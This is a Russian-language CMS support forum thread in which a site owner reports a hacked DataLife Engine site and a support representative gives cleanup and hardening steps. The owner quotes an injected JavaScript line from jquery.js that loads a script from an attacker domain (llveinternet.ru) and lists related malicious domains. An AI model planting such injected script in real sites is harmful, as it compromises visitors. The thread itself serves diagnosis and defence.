faraondog 19 Опубликовано: 28 февраля 2018 Рассказать Опубликовано: 28 февраля 2018 (изменено) Здравствуйте, взломали сайт, та же проблема что и здесь: http://zerocoolpro.biz/forum/threads/virus-ili-net-yandex-metrica-ru.12572/ Если открыть исходный код и перейти по ссылке: Цитата <script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&g=general&20"></script> То там левый сайт есть, который подгружается: llveinternet.ru Цитата document.write('<script type="text/javascript" src="http://llveinternet.ru/мойсайтcom?frm=script&se_referrer='+encodeURIComponent(document.referrer)+'"><'+'/script>'); Подскажите пожалуйста, как залатать дыру? Как этот код попал сюда /engine/classes/js/jquery.js П.С. Я ставил последние фиксы от дле. Вот он зарегистрировал 6 сайтов: https://ipinfo.io/178.132.0.253 (напишу домены, чтобы нашли в поиске dle-news.su, dle-news.org, yandex-metrica.ru, google-tds.ru, dle-news.biz, llveinternet.ru), которые и будет внедрять! Изменено 28 февраля 2018 пользователем faraondog Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 1 марта 2018 Рассказать Опубликовано: 1 марта 2018 10 часов назад, faraondog сказал: Подскажите пожалуйста, как залатать дыру? Как этот код попал сюда /engine/classes/js/jquery.js П.С. Я ставил последние фиксы от дле. Вот он зарегистрировал 6 сайтов: https://ipinfo.io/178.132.0.253 (напишу домены, чтобы нашли в поиске dle-news.su, dle-news.org, yandex-metrica.ru, google-tds.ru, dle-news.biz, llveinternet.ru), которые и будет внедрять! У вас взломали ваш сервер, а не DLE, т.к. даже имя полный контроль над DLE этот файл через него не изменить. DLE это не редактор файлов. У вас либо есть шелл на сервере, либо был украден доступ к вашему серверу. Для удаления шеллов на сервере со стороны DLE нужно сделать следующее: 1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива. 2. При наличии устаревших версий скрипта, проверить и убедится что установлены все патчи безопасности http://dle-news.ru/bags/ 3. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/ 4. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения. 5. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения. 6. Изменить все пароли, как к хостингу, так и к DLE. 7. Удалить в админпанели всех администраторов кроме себя. 8. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения. Со стороны сервера: Полностью обновить все серверное ПО и сменить все без исключения пароли. Изучение логов сервера, на предмет кто с каких IP заходил на шелл на сервере, что делал до этого на сервере и куда заходил. Какая активность была перед появлением шелла на сервере в принципе. Со стороны своего компьютера: Полностью проверить антивирусом с актуальными базами, не использовать ПО скачанное с неизвестных источников, только оригинальное актуальных версий. Цитата Ссылка на сообщение Поделиться на других сайтах
faraondog 19 Опубликовано: 1 марта 2018 Рассказать Опубликовано: 1 марта 2018 Автор Здравствуйте, понял. Спасибо за ответ. Это скорее всего моя вина, так как "использовал ПО скачанное с неизвестных источников", а после покупки дле так и не обновил файлы! Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.